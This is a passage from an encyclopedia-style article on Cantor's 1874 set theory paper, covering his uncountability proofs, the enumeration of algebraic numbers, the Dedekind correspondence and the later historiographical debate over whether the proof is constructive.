This remark contains Cantor's uncountability theorem, which only states that an interval [a, b] cannot be put into one-to-one correspondence with the set of positive integers. It does not state that this interval is an infinite set of larger cardinality than the set of positive integers. Cardinality is defined in Cantor's next article, which was published in 1878.[7]
Cantor only states his uncountability theorem. He does not use it in any proofs.[3]
To prove that the set of real algebraic numbers is countable, define the height of a polynomial of degree n with integer coefficients as: n − 1 + |a0| + |a1| + ... + |an|, where a0, a1, ..., an are the coefficients of the polynomial. Order the polynomials by their height, and order the real roots of polynomials of the same height by numeric order. Since there are only a finite number of roots of polynomials of a given height, these orderings put the real algebraic numbers into a sequence. Cantor went a step further and produced a sequence in which each real algebraic number appears just once. He did this by only using polynomials that are irreducible over the integers. The following table contains the beginning of Cantor's enumeration.[9]
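The countability argument hinges on there being only finitely many polynomials of each height. A sketch (helper names invented; Cantor's extra restriction to irreducible polynomials is omitted) that enumerates the integer-coefficient polynomials of a given height as coefficient lists [a0, ..., an] with a nonzero leading coefficient:

```haskell
-- All lists of k integers whose absolute values sum to exactly t.
absSums :: Int -> Int -> [[Int]]
absSums 0 t = [ [] | t == 0 ]
absSums k t = [ c : rest
              | a <- [0 .. t]
              , c <- if a == 0 then [0] else [a, -a]
              , rest <- absSums (k - 1) (t - a) ]

-- Polynomials of height h: a degree-n polynomial contributes n - 1,
-- and its coefficients contribute |a0| + ... + |an| = h - n + 1.
polysOfHeight :: Int -> [[Int]]
polysOfHeight h =
  [ cs | n <- [1 .. h]
       , cs <- absSums (n + 1) (h - n + 1)
       , last cs /= 0 ]          -- leading coefficient must be nonzero
```

For height 1 this yields only x and −x, whose sole root is 0, matching the first row of Cantor's enumeration; each height contributes a finite batch of roots, so concatenating the batches lists every real algebraic number.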
Only the first part of Cantor's second theorem needs to be proved. It states: Given any sequence of real numbers x1, x2, x3, ... and any interval [a, b], there is a number in [a, b] that is not contained in the given sequence.[B]
To find a number in [a, b] that is not contained in the given sequence, construct two sequences of real numbers as follows: Find the first two numbers of the given sequence that are in the open interval (a, b). Denote the smaller of these two numbers by a1 and the larger by b1. Similarly, find the first two numbers of the given sequence that are in (a1, b1). Denote the smaller by a2 and the larger by b2. Continuing this procedure generates a sequence of intervals (a1, b1), (a2, b2), (a3, b3), ... such that each interval in the sequence contains all succeeding intervals; that is, it generates a sequence of nested intervals. This implies that the sequence a1, a2, a3, ... is increasing and the sequence b1, b2, b3, ... is decreasing.[10]
Either the number of intervals generated is finite or infinite. If finite, let (aL, bL) be the last interval. If infinite, take the limits a∞ = lim n→∞ an and b∞ = lim n→∞ bn. Since an < bn for all n, either a∞ = b∞ or a∞ < b∞. Thus, there are three cases to consider:
The proof is complete since, in all cases, at least one real number in [a,b] has been found that is not contained in the given sequence.[D]
Cantor's proofs are constructive and have been used to write a computer program that generates the digits of a transcendental number. This program applies Cantor's construction to a sequence containing all the real algebraic numbers between 0 and 1. The article that discusses this program gives some of its output, which shows how the construction generates a transcendental.[12]
An example illustrates how Cantor's construction works. Consider the sequence: 1/2, 1/3, 2/3, 1/4, 3/4, 1/5, 2/5, 3/5, 4/5, ... This sequence is obtained by ordering the rational numbers in (0, 1) by increasing denominators, ordering those with the same denominator by increasing numerators, and omitting reducible fractions. The table below shows the first five steps of the construction. The table's first column contains the intervals (an, bn). The second column lists the terms visited during the search for the first two terms in (an, bn). These two terms are in red.[13]
Since the sequence contains all the rational numbers in (0, 1), the construction generates an irrational number, which turns out to be √2 − 1.[14]
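The construction on this particular sequence is easy to run with exact rational arithmetic; a sketch (function names are invented):

```haskell
import Data.Ratio ((%))

-- The sequence 1/2, 1/3, 2/3, 1/4, 3/4, ...: rationals in (0, 1) ordered
-- by increasing denominator, skipping reducible fractions.
rationals :: [Rational]
rationals = [ p % q | q <- [2 ..], p <- [1 .. q - 1], gcd p q == 1 ]

-- One step of Cantor's construction: the first two sequence terms that
-- fall inside (a, b) become the endpoints of the next, smaller interval.
nextInterval :: (Rational, Rational) -> (Rational, Rational)
nextInterval (a, b) =
  let x : y : _ = [ r | r <- rationals, a < r, r < b ]
  in (min x y, max x y)

-- The nested intervals (a1, b1), (a2, b2), ..., starting from (0, 1).
intervals :: [(Rational, Rational)]
intervals = tail (iterate nextInterval (0, 1))
```

The first two intervals come out as (1/3, 1/2) and (2/5, 3/7), and the endpoints close in on √2 − 1 ≈ 0.41421.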
Cantor's construction produces mediants because the rational numbers were sequenced by increasing denominator. The first interval in the table is (1/3, 1/2). Since 1/3 and 1/2 are adjacent in the Farey sequence F3, their mediant 2/5 is the first fraction in the sequence between 1/3 and 1/2. Hence, 1/3 < 2/5 < 1/2. In this inequality, 1/2 has the smallest denominator, so the second fraction is the mediant of 2/5 and 1/2, which equals 3/7. This implies 1/3 < 2/5 < 3/7 < 1/2. Therefore, the next interval is (2/5, 3/7).
We will prove that the endpoints of the intervals converge to the continued fraction [0; 2, 2, …]. This continued fraction is the limit of its convergents pn/qn:

p1/q1 = 1/2, p2/q2 = 2/5, p3/q3 = 5/12, p4/q4 = 12/29, …

The pn and qn sequences satisfy the recurrences:[16]

pn = 2pn−1 + pn−2 and qn = 2qn−1 + qn−2, with p0 = 0, p1 = 1, q0 = 1, q1 = 2.
First, we prove by induction that for odd n, the n-th interval in the table is:

((pn + pn−1)/(qn + qn−1), pn/qn),

and for even n, the interval's endpoints are reversed: (pn/qn, (pn + pn−1)/(qn + qn−1)).
This is true for the first interval since p1/q1 = 1/2 and (p1 + p0)/(q1 + q0) = 1/3, so the first interval is (1/3, 1/2).
Assume that the inductive hypothesis is true for the k-th interval. If k is odd, this interval is:

((pk + pk−1)/(qk + qk−1), pk/qk).
The mediant of its endpoints, $\frac{2p_k + p_{k-1}}{2q_k + q_{k-1}} = \frac{p_{k+1}}{q_{k+1}}$, is the first fraction in the sequence between these endpoints.
Hence, $\frac{p_k + p_{k-1}}{q_k + q_{k-1}} < \frac{p_{k+1}}{q_{k+1}} < \frac{p_k}{q_k}$.
In this inequality, $\frac{p_k}{q_k}$ has the smallest denominator, so the second fraction is the mediant of $\frac{p_{k+1}}{q_{k+1}}$ and $\frac{p_k}{q_k}$, which equals $\frac{p_{k+1} + p_k}{q_{k+1} + q_k}$.
This implies: $\frac{p_k + p_{k-1}}{q_k + q_{k-1}} < \frac{p_{k+1}}{q_{k+1}} < \frac{p_{k+1} + p_k}{q_{k+1} + q_k} < \frac{p_k}{q_k}$.
Therefore, the $(k+1)$-st interval is $\left(\frac{p_{k+1}}{q_{k+1}}, \frac{p_{k+1} + p_k}{q_{k+1} + q_k}\right)$.
This is the desired interval; $\frac{p_{k+1}}{q_{k+1}}$ is the left endpoint because $k + 1$ is even. Thus, the inductive hypothesis is true for the $(k+1)$-st interval. For even $k$, the proof is similar. This completes the inductive proof.
Since the right endpoints of the intervals are decreasing and every other endpoint is $\frac{p_{2n-1}}{q_{2n-1}}$, their limit equals $\lim_{n\to\infty} \frac{p_n}{q_n}$. The left endpoints have the same limit because they are increasing and every other endpoint is $\frac{p_{2n}}{q_{2n}}$. As mentioned above, this limit is the continued fraction $[0; 2, 2, \dots]$, which equals $\sqrt{2} - 1$.[17]
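The convergence claim can be checked numerically from the recurrences used in the proof; this sketch assumes the standard initialization $p_0/q_0 = 0/1$, $p_1/q_1 = 1/2$ consistent with the table's first interval.

```python
from math import sqrt

# Convergents p_n/q_n of the continued fraction [0; 2, 2, 2, ...],
# computed from p_n = 2*p_{n-1} + p_{n-2} and q_n = 2*q_{n-1} + q_{n-2},
# with p_0/q_0 = 0/1 and p_1/q_1 = 1/2.
p, q = [0, 1], [1, 2]
for _ in range(10):
    p.append(2 * p[-1] + p[-2])
    q.append(2 * q[-1] + q[-2])

convergents = [pi / qi for pi, qi in zip(p, q)]
print(convergents[:4])  # 0.0, 0.5, 0.4, 0.4166...
print(abs(p[-1] / q[-1] - (sqrt(2) - 1)))  # tiny: convergents tend to sqrt(2) - 1
```

Note that $p_2/q_2 = 2/5$ and $p_3/q_3 = 5/12$ reproduce the interval endpoints appearing in the table, and $(p_1 + p_0)/(q_1 + q_0) = 1/3$ is the first interval's left endpoint.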
In 1879, Cantor published a new uncountability proof that modifies his 1874 proof. He first defines the topological notion of a point set P being "everywhere dense in an interval":[E]
In this discussion of Cantor's proof: a, b, c, d are used instead of α, β, γ, δ. Also, Cantor only uses his interval notation if the first endpoint is less than the second. For this discussion, this means that (a, b) implies a < b.
Since the discussion of Cantor's 1874 proof was simplified by using open intervals rather than closed intervals, the same simplification is used here. This requires an equivalent definition of everywhere dense: A set P is everywhere dense in the interval [a, b] if and only if every open subinterval (c, d) of [a, b] contains at least one point of P.[18]
Cantor did not specify how many points of P an open subinterval (c, d) must contain. He did not need to specify this because the assumption that every open subinterval contains at least one point of P implies that every open subinterval contains infinitely many points of P.[G]
Cantor modified his 1874 proof with a new proof of its second theorem: Given any sequence P of real numbers x1, x2, x3, ... and any interval [a, b], there is a number in [a, b] that is not contained in P. Cantor's new proof has only two cases. First, it handles the case of P not being dense in the interval; then it deals with the more difficult case of P being dense in the interval. This division into cases not only indicates which sequences are more difficult to handle, but it also reveals the important role denseness plays in the proof.[proof 1]
In the first case, P is not dense in [a, b]. By definition, P is dense in [a, b] if and only if for all subintervals (c, d) of [a, b], there is an x ∈ P such that x ∈ (c, d). Taking the negation of each side of the "if and only if" produces: P is not dense in [a, b] if and only if there exists a subinterval (c, d) of [a, b] such that for all x ∈ P: x ∉ (c, d). Therefore, every number in (c, d) is not contained in the sequence P.[proof 1] This case handles case 1 and case 3 of Cantor's 1874 proof.
In the second case, which handles case 2 of Cantor's 1874 proof, P is dense in [a, b]. The denseness of sequence P is used to recursively define a sequence of nested intervals that excludes all the numbers in P and whose intersection contains a single real number in [a, b]. The sequence of intervals starts with (a, b). Given an interval in the sequence, the next interval is obtained by finding the two numbers with the least indices that belong to P and to the current interval. These two numbers are the endpoints of the next open interval. Since an open interval excludes its endpoints, every nested interval eliminates two numbers from the front of sequence P, which implies that the intersection of the nested intervals excludes all the numbers in P.[proof 1] Details of this proof and a proof that this intersection contains a single real number in [a, b] are given below.
The recursive step starts with the interval $(a_{n-1}, b_{n-1})$, the inequalities $k_1 < k_2 < \dots < k_{2n-2}$ and $a < a_1 < \dots < a_{n-1} < b_{n-1} < \dots < b_1 < b$, and the fact that the interval $(a_{n-1}, b_{n-1})$ excludes the first $2n-2$ members of the sequence P; that is, $x_m \notin (a_{n-1}, b_{n-1})$ for $m \le k_{2n-2}$. Since P is dense in $[a, b]$, there are infinitely many numbers of P in $(a_{n-1}, b_{n-1})$. Let $x_{k_{2n-1}}$ be the number with the least index and $x_{k_{2n}}$ be the number with the next larger index, and let $a_n$ be the smaller and $b_n$ be the larger of these two numbers. Then $k_{2n-1} < k_{2n}$, $a_{n-1} < a_n < b_n < b_{n-1}$, and $(a_n, b_n)$ is a proper subinterval of $(a_{n-1}, b_{n-1})$. Combining these inequalities with the ones for step $n-1$ of the recursion produces $k_1 < k_2 < \dots < k_{2n-1} < k_{2n}$ and $a < a_1 < \dots < a_n < b_n < \dots < b_1 < b$. Also, $x_m \notin (a_n, b_n)$ for $m = k_{2n-1}$ and $m = k_{2n}$ since these $x_m$ are the endpoints of $(a_n, b_n)$. This, together with $(a_{n-1}, b_{n-1})$ excluding the first $2n-2$ members of sequence P, implies that the interval $(a_n, b_n)$ excludes the first $2n$ members of P; that is, $x_m \notin (a_n, b_n)$ for $m \le k_{2n}$. Therefore, for all $n$, $x_n \notin (a_n, b_n)$ since $n \le k_{2n}$.[proof 1]
The sequence $a_n$ is increasing and bounded above by $b$, so the limit $A = \lim_{n\to\infty} a_n$ exists. Similarly, the limit $B = \lim_{n\to\infty} b_n$ exists since the sequence $b_n$ is decreasing and bounded below by $a$. Also, $a_n < b_n$ implies $A \le B$. If $A < B$, then for every $n$: $x_n \notin (A, B)$ because $x_n$ is not in the larger interval $(a_n, b_n)$. This contradicts P being dense in $[a, b]$. Hence, $A = B$. For all $n$, $A \in (a_n, b_n)$ but $x_n \notin (a_n, b_n)$. Therefore, $A$ is a number in $[a, b]$ that is not contained in P.[proof 1]
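The second case can be sketched by running the recursive step on a concrete dense sequence. Here the dyadic rationals stand in for P (an illustrative choice, not from the article), and the key invariant $x_n \notin (a_n, b_n)$ is checked directly; for this particular sequence the nested intervals happen to close in on 1/3.

```python
import itertools
from fractions import Fraction

def dyadics():
    """Dyadic rationals in (0, 1): 1/2, 1/4, 3/4, 1/8, 3/8, ... --
    a sequence that is dense in [0, 1]."""
    d = 2
    while True:
        for k in range(1, d, 2):
            yield Fraction(k, d)
        d *= 2

P = list(itertools.islice(dyadics(), 5000))

a, b = Fraction(0), Fraction(1)
intervals = []
for _ in range(6):
    # Recursive step: the two least-indexed members of P strictly inside
    # (a, b) become the endpoints of the next open interval.
    x, y = [t for t in P if a < t < b][:2]
    a, b = min(x, y), max(x, y)
    intervals.append((a, b))

# The invariant from the proof: x_n is excluded from (a_n, b_n).
for n, (an, bn) in enumerate(intervals, start=1):
    assert not (an < P[n - 1] < bn)

print(intervals[-1])
```

The intersection of these intervals is the single number 1/3, which is not dyadic and therefore lies outside the whole sequence, exactly as the proof requires.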
The development leading to Cantor's 1874 article appears in the correspondence between Cantor and Richard Dedekind. On November 29, 1873, Cantor asked Dedekind whether the collection of positive integers and the collection of positive real numbers "can be corresponded so that each individual of one collection corresponds to one and only one individual of the other?" Cantor added that collections having such a correspondence include the collection of positive rational numbers, and collections of the form $(a_{n_1, n_2, \dots, n_\nu})$ where $n_1, n_2, \dots, n_\nu$, and $\nu$ are positive integers.[19]
Dedekind replied that he was unable to answer Cantor's question, and said that it "did not deserve too much effort because it has no particular practical interest". Dedekind also sent Cantor a proof that the set of algebraic numbers is countable.[20]
On December 2, Cantor responded that his question does have interest: "It would be nice if it could be answered; for example, provided that it could be answered no, one would have a new proof of Liouville's theorem that there are transcendental numbers."[21]
On December 7, Cantor sent Dedekind a proof by contradiction that the set of real numbers is uncountable. Cantor starts by assuming that the real numbers in $[0, 1]$ can be written as a sequence. Then, he applies a construction to this sequence to produce a number in $[0, 1]$ that is not in the sequence, thus contradicting his assumption.[22] Together, the letters of December 2 and 7 provide a non-constructive proof of the existence of transcendental numbers.[23] Also, the proof in Cantor's December 7 letter shows some of the reasoning that led to his discovery that the real numbers form an uncountable set.[24]
The proof is by contradiction and starts by assuming that the real numbers in $[0, 1]$ can be written as a sequence:
An increasing sequence is extracted from this sequence by letting $\omega_1^1$ be the first term, $\omega_1^2$ the next largest term following $\omega_1^1$, $\omega_1^3$ the next largest term following $\omega_1^2$, and so forth. The same procedure is applied to the remaining members of the original sequence to extract another increasing sequence. By continuing this process of extracting sequences, one sees that the sequence $(\mathrm{I})$ can be decomposed into infinitely many sequences:[22]
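On a finite prefix, the extraction step described here is a greedy "next larger term" scan; a sketch (the function name is ours, not Cantor's):

```python
def decompose(seq):
    """Repeatedly extract the greedy increasing subsequence: take the
    first remaining term, then each later term that exceeds the last
    term taken; repeat the procedure on whatever is left over."""
    remaining = list(seq)
    runs = []
    while remaining:
        run, rest = [remaining[0]], []
        for x in remaining[1:]:
            (run if x > run[-1] else rest).append(x)
        runs.append(run)
        remaining = rest
    return runs

print(decompose([0.5, 0.3, 0.8, 0.1, 0.9, 0.2]))
# [[0.5, 0.8, 0.9], [0.3], [0.1, 0.2]]
```

Each extracted run is increasing, and together the runs contain every term of the original sequence exactly once, which is the decomposition the proof relies on.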
Let $[p, q]$ be an interval such that no term of sequence (1) lies in it. For example, let $p$ and $q$ satisfy $\omega_1^1 < p < q < \omega_1^2$. Then $\omega_1^1 < p < q < \omega_1^n$ for $n \ge 2$, so no term of sequence (1) lies in $[p, q]$.[22]
Now consider whether the terms of the other sequences lie outside $[p, q]$. All terms of some of these sequences may lie outside of $[p, q]$; however, there must be some sequence such that not all its terms lie outside $[p, q]$. Otherwise, the numbers in $[p, q]$ would not be contained in sequence $(\mathrm{I})$, contrary to the initial hypothesis. Let sequence $(k)$ be the first sequence that contains a term in $[p, q]$ and let $\omega_k^n$ be the first term. Since $p < \omega_k^n < q$, let $p_1$ and $q_1$ satisfy $p < p_1 < q_1 < \omega_k^n < q$. Then $[p, q]$ is a proper superset of $[p_1, q_1]$ (in symbols, $[p, q] \supsetneq [p_1, q_1]$). Also, the terms of sequences $(1), (2), \ldots, (k-1)$ lie outside of $[p_1, q_1]$.[22]
Repeat the above argument starting with $[p_1, q_1]$: Let sequence $(k_1)$ be the first sequence containing a term in $[p_1, q_1]$ and let $\omega_{k_1}^n$ be the first term. Since $p_1 < \omega_{k_1}^n < q_1$, let $p_2$ and $q_2$ satisfy $p_1 < p_2 < q_2 < \omega_{k_1}^n < q_1$. Then $[p_1, q_1] \supsetneq [p_2, q_2]$ and the terms of sequences $(k_1), \ldots, (k_2 - 1)$ lie outside of $[p_2, q_2]$.[22]
One sees that it is possible to form an infinite sequence of nested intervals $[p, q] \supsetneq [p_1, q_1] \supsetneq [p_2, q_2] \supsetneq \ldots$ such that: the members of the 1st, 2nd, ..., $(k-1)$-st sequence lie outside $[p, q]$; the members of the $k$-th, ..., $(k_1 - 1)$-st sequence lie outside $[p_1, q_1]$; the members of the $k_1$-th, ..., $(k_2 - 1)$-st sequence lie outside $[p_2, q_2]$; and so on.[22]
Since $p_n$ and $q_n$ are bounded monotonic sequences, the limits $\lim_{n\to\infty} p_n$ and $\lim_{n\to\infty} q_n$ exist. Also, $p_n < q_n$ for all $n$ implies $\lim_{n\to\infty} p_n \le \lim_{n\to\infty} q_n$. Hence, there is at least one number $\eta$ in $(0, 1)$ that lies in all the intervals $[p, q]$ and $[p_n, q_n]$: namely, $\eta$ can be any number in $[\lim_{n\to\infty} p_n, \lim_{n\to\infty} q_n]$. This implies that $\eta$ lies outside all the sequences $(1), (2), (3), \ldots$, contradicting the initial hypothesis that sequence $(\mathrm{I})$ contains all the real numbers in $[0, 1]$. Therefore, the set of all real numbers is uncountable.[22]
Dedekind received Cantor's proof on December 8. On that same day, Dedekind simplified the proof and mailed his proof to Cantor. Cantor used Dedekind's proof in his article.[25]The letter containing Cantor's December 7 proof was not published until 1937.[26]
On December 9, Cantor announced the theorem that allowed him to construct transcendental numbers as well as prove the uncountability of the set of real numbers:
I show directly that if I start with a sequence
(1)   ω1, ω2, ..., ωn, ...
I can determine, in every given interval [α, β], a number η that is not included in (1).[27]
This is the second theorem in Cantor's article. It comes from realizing that his construction can be applied to any sequence, not just to sequences that supposedly enumerate the real numbers. So Cantor had a choice between two proofs that demonstrate the existence of transcendental numbers: one proof is constructive, but the other is not. These two proofs can be compared by starting with a sequence consisting of all the real algebraic numbers.
The constructive proof applies Cantor's construction to this sequence and the interval [a,b] to produce a transcendental number in this interval.[5]
The non-constructive proof uses two proofs by contradiction:
Cantor chose to publish the constructive proof, which not only produces a transcendental number but is also shorter and avoids two proofs by contradiction. The non-constructive proof from Cantor's correspondence is simpler than the one above because it works with all the real numbers rather than the interval [a,b]. This eliminates the subsequence step and all occurrences of [a,b] in the second proof by contradiction.[5]
Akihiro Kanamori, who specializes in set theory, stated that "Accounts of Cantor's work have mostly reversed the order for deducing the existence of transcendental numbers, establishing first the uncountability of the reals and only then drawing the existence conclusion from the countability of the algebraic numbers. In textbooks the inversion may be inevitable, but this has promoted the misconception that Cantor's arguments are non-constructive."[29]
Cantor's published proof and the reverse-order proof both use the theorem: Given a sequence of reals, a real can be found that is not in the sequence. By applying this theorem to the sequence of real algebraic numbers, Cantor produced a transcendental number. He then proved that the reals are uncountable: Assume that there is a sequence containing all the reals. Applying the theorem to this sequence produces a real not in the sequence, contradicting the assumption that the sequence contains all the reals. Hence, the reals are uncountable.[5]The reverse-order proof starts by first proving the reals are uncountable. It then proves that transcendental numbers exist: If there were no transcendental numbers, all the reals would be algebraic and hence countable, which contradicts what was just proved. This contradiction proves that transcendental numbers exist without constructing any.[29]
The correspondence containing Cantor's non-constructive reasoning was published in 1937. By then, other mathematicians had rediscovered his non-constructive, reverse-order proof. As early as 1921, this proof was called "Cantor's proof" and criticized for not producing any transcendental numbers.[30] In that year, Oskar Perron gave the reverse-order proof and then stated: "... Cantor's proof for the existence of transcendental numbers has, along with its simplicity and elegance, the great disadvantage that it is only an existence proof; it does not enable us to actually specify even a single transcendental number."[31][I]
As early as 1930, some mathematicians attempted to correct this misconception of Cantor's work. In that year, the set theorist Abraham Fraenkel stated that Cantor's method is "... a method that incidentally, contrary to a widespread interpretation, is fundamentally constructive and not merely existential."[32] In 1972, Irving Kaplansky wrote: "It is often said that Cantor's proof is not 'constructive,' and so does not yield a tangible transcendental number. This remark is not justified. If we set up a definite listing of all algebraic numbers ... and then apply the diagonal procedure ..., we get a perfectly definite transcendental number (it could be computed to any number of decimal places)."[33][J] Cantor's proof is not only constructive, it is also simpler than Perron's proof, which requires the detour of first proving that the set of all reals is uncountable.[34]
Cantor's diagonal argument has often replaced his 1874 construction in expositions of his proof. The diagonal argument is constructive and produces a more efficient computer program than his 1874 construction. Using it, a computer program has been written that computes the digits of a transcendental number in polynomial time. The program that uses Cantor's 1874 construction requires at least sub-exponential time.[35][K]
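The diagonal procedure itself is simple to sketch: given any listing of decimal digit expansions, change the i-th digit of the i-th expansion, avoiding 0 and 9 so the resulting number has a unique decimal expansion. The listing below is an arbitrary illustration, not an actual enumeration of the algebraic numbers.

```python
def diagonal_digits(rows):
    """Digits of a number in (0, 1) that differs from the i-th listed
    expansion in its i-th digit (4 becomes 5; anything else becomes 4)."""
    return [4 if row[i] != 4 else 5 for i, row in enumerate(rows)]

# An arbitrary finite listing of digit expansions (illustrative only).
rows = [
    [1, 4, 1, 4, 2],
    [3, 3, 3, 3, 3],
    [1, 2, 5, 0, 0],
    [9, 9, 9, 4, 9],
    [0, 0, 0, 4, 0],
]
d = diagonal_digits(rows)
print(d)  # [4, 4, 4, 5, 4] -- differs from row i at digit i
```

Applied to a definite listing of all real algebraic numbers, this produces the digits of a definite transcendental number, which is the point of Kaplansky's remark.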
The presentation of the non-constructive proof without mentioning Cantor's constructive proof appears in some books that were quite successful as measured by the length of time new editions or reprints appeared, for example: Oskar Perron's Irrationalzahlen (1921; 1960, 4th edition), Eric Temple Bell's Men of Mathematics (1937; still being reprinted), Godfrey Hardy and E. M. Wright's An Introduction to the Theory of Numbers (1938; 2008 6th edition), Garrett Birkhoff and Saunders Mac Lane's A Survey of Modern Algebra (1941; 1997 5th edition), and Michael Spivak's Calculus (1967; 2008 4th edition).[36][L] Since 2014, at least two books have appeared stating that Cantor's proof is constructive,[37] and at least four have appeared stating that his proof does not construct any (or a single) transcendental.[38]
Asserting that Cantor gave a non-constructive argument without mentioning the constructive proof he published can lead to erroneous statements about the history of mathematics. In A Survey of Modern Algebra, Birkhoff and Mac Lane state: "Cantor's argument for this result [Not every real number is algebraic] was at first rejected by many mathematicians, since it did not exhibit any specific transcendental number."[39] The proof that Cantor published produces transcendental numbers, and there appears to be no evidence that his argument was rejected. Even Leopold Kronecker, who had strict views on what is acceptable in mathematics and who could have delayed publication of Cantor's article, did not delay it.[4] In fact, applying Cantor's construction to the sequence of real algebraic numbers produces a limiting process that Kronecker accepted, namely, it determines a number to any required degree of accuracy.[M]
Historians of mathematics have discovered the following facts about Cantor's article "On a Property of the Collection of All Real Algebraic Numbers":
To explain these facts, historians have pointed to the influence of Cantor's former professors, Karl Weierstrass and Leopold Kronecker. Cantor discussed his results with Weierstrass on December 23, 1873.[46] Weierstrass was first amazed by the concept of countability, but then found the countability of the set of real algebraic numbers useful.[47] Cantor did not want to publish yet, but Weierstrass felt that he must publish at least his results concerning the algebraic numbers.[46]
From his correspondence, it appears that Cantor only discussed his article with Weierstrass. However, Cantor told Dedekind: "The restriction which I have imposed on the published version of my investigations is caused in part by local circumstances ..."[46] Cantor biographer Joseph Dauben believes that "local circumstances" refers to Kronecker who, as a member of the editorial board of Crelle's Journal, had delayed publication of an 1870 article by Eduard Heine, one of Cantor's colleagues. Cantor would submit his article to Crelle's Journal.[48]
Weierstrass advised Cantor to leave his uncountability theorem out of the article he submitted, but Weierstrass also told Cantor that he could add it as a marginal note during proofreading, which he did.[43] It appears in a remark at the end of the article's introduction. The opinions of Kronecker and Weierstrass both played a role here. Kronecker did not accept infinite sets, and it seems that Weierstrass did not accept that two infinite sets could be so different, with one being countable and the other not.[49] Weierstrass changed his opinion later.[50] Without the uncountability theorem, the article needed a title that did not refer to this theorem. Cantor chose "Ueber eine Eigenschaft des Inbegriffes aller reellen algebraischen Zahlen" ("On a Property of the Collection of All Real Algebraic Numbers"), which refers to the countability of the set of real algebraic numbers, the result that Weierstrass found useful.[51]
Kronecker's influence appears in the proof of Cantor's second theorem. Cantor used Dedekind's version of the proof except he left out why the limits $a_\infty = \lim_{n\to\infty} a_n$ and $b_\infty = \lim_{n\to\infty} b_n$ exist. Dedekind had used his "principle of continuity" to prove they exist. This principle (which is equivalent to the least upper bound property of the real numbers) comes from Dedekind's construction of the real numbers, a construction Kronecker did not accept.[52]
Cantor restricted his first theorem to the set of real algebraic numbers even though Dedekind had sent him a proof that handled all algebraic numbers.[20]Cantor did this for expository reasons and because of "local circumstances".[53]This restriction simplifies the article because the second theorem works with real sequences. Hence, the construction in the second theorem can be applied directly to the enumeration of the real algebraic numbers to produce "an effective procedure for the calculation of transcendental numbers". This procedure would be acceptable to Weierstrass.[54]
Since 1856, Dedekind had developed theories involving infinitely many infinite sets, for example: ideals, which he used in algebraic number theory, and Dedekind cuts, which he used to construct the real numbers. This work enabled him to understand and contribute to Cantor's work.[55]
Dedekind's first contribution concerns the theorem that the set of real algebraic numbers is countable. Cantor is usually given credit for this theorem, but the mathematical historian José Ferreirós calls it "Dedekind's theorem." Their correspondence reveals what each mathematician contributed to the theorem.[56]
In his letter introducing the concept of countability, Cantor stated without proof that the set of positive rational numbers is countable, as are sets of the form $(a_{n_1, n_2, \dots, n_\nu})$ where $n_1, n_2, \dots, n_\nu$, and $\nu$ are positive integers.[57] Cantor's second result uses an indexed family of numbers: a set of the form $(a_{n_1, n_2, \dots, n_\nu})$ is the range of a function from the $\nu$ indices to the set of real numbers. His second result implies his first: let $\nu = 2$ and $a_{n_1, n_2} = n_1/n_2$. The function can be quite general, for example, $a_{n_1, n_2, n_3, n_4, n_5} = (n_1/n_2)^{1/n_3} + \tan(n_4/n_5)$.
Dedekind replied with a proof of the theorem that the set of all algebraic numbers is countable.[20] In his reply to Dedekind, Cantor did not claim to have proved Dedekind's result. He did indicate how he proved his theorem about indexed families of numbers: "Your proof that (n) [the set of positive integers] can be correlated one-to-one with the field of all algebraic numbers is approximately the same as the way I prove my contention in the last letter. I take $n_1^2 + n_2^2 + \cdots + n_\nu^2 = \mathfrak{N}$ and order the elements accordingly."[58] However, Cantor's ordering is weaker than Dedekind's and cannot be extended to $n$-tuples of integers that include zeros.[59]
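Cantor's ordering can be sketched for pairs: sort index tuples by increasing $\mathfrak{N} = n_1^2 + n_2^2$, breaking ties lexicographically (the tie-break is our choice; the letter does not specify one).

```python
def pairs_in_cantor_order(max_n):
    """All pairs (n1, n2) with entries in 1..max_n, ordered by
    N = n1^2 + n2^2 and then lexicographically."""
    pairs = [(n1, n2) for n1 in range(1, max_n + 1)
                      for n2 in range(1, max_n + 1)]
    return sorted(pairs, key=lambda t: (t[0] ** 2 + t[1] ** 2, t))

order = pairs_in_cantor_order(4)
print(order[:6])  # [(1, 1), (1, 2), (2, 1), (2, 2), (1, 3), (3, 1)]
```

Every pair of positive integers gets a definite position in this list, so with $a_{n_1, n_2} = n_1/n_2$ the list enumerates the positive rationals (with repetition), which is the countability claim in question.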
Dedekind's second contribution is his proof of Cantor's second theorem. Dedekind sent this proof in reply to Cantor's letter that contained the uncountability theorem, which Cantor proved using infinitely many sequences. Cantor next wrote that he had found a simpler proof that did not use infinitely many sequences.[60] So Cantor had a choice of proofs and chose to publish Dedekind's.[61]
Cantor thanked Dedekind privately for his help: "... your comments (which I value highly) and your manner of putting some of the points were of great assistance to me."[46] However, he did not mention Dedekind's help in his article. In previous articles, he had acknowledged help received from Kronecker, Weierstrass, Heine, and Hermann Schwarz. Cantor's failure to mention Dedekind's contributions damaged his relationship with Dedekind. Dedekind stopped replying to his letters and did not resume the correspondence until October 1876.[62][N]
Cantor's article introduced the uncountability theorem and the concept of countability. Both would lead to significant developments in mathematics. The uncountability theorem demonstrated that one-to-one correspondences can be used to analyze infinite sets. In 1878, Cantor used them to define and compare cardinalities. He also constructed one-to-one correspondences to prove that the $n$-dimensional spaces $\mathbf{R}^n$ (where $\mathbf{R}$ is the set of real numbers) and the set of irrational numbers have the same cardinality as $\mathbf{R}$.[63][O]
In 1883, Cantor extended the positive integers with his infinite ordinals. This extension was necessary for his work on the Cantor–Bendixson theorem. Cantor discovered other uses for the ordinals; for example, he used sets of ordinals to produce an infinity of sets having different infinite cardinalities.[65] His work on infinite sets together with Dedekind's set-theoretical work created set theory.[66]
The concept of countability led to countable operations and objects that are used in various areas of mathematics. For example, in 1878, Cantor introduced countable unions of sets.[67] In the 1890s, Émile Borel used countable unions in his theory of measure, and René Baire used countable ordinals to define his classes of functions.[68] Building on the work of Borel and Baire, Henri Lebesgue created his theories of measure and integration, which were published from 1899 to 1901.[69]
Countable models are used in set theory. In 1922, Thoralf Skolem proved that if conventional axioms of set theory are consistent, then they have a countable model. Since this model is countable, its set of real numbers is countable. This consequence is called Skolem's paradox, and Skolem explained why it does not contradict Cantor's uncountability theorem: although there is a one-to-one correspondence between this set and the set of positive integers, no such one-to-one correspondence is a member of the model. Thus the model considers its set of real numbers to be uncountable, or more precisely, the first-order sentence that says the set of real numbers is uncountable is true within the model.[70] In 1963, Paul Cohen used countable models to prove his independence theorems.[71]
. . . But this contradicts a very general theorem, which we have
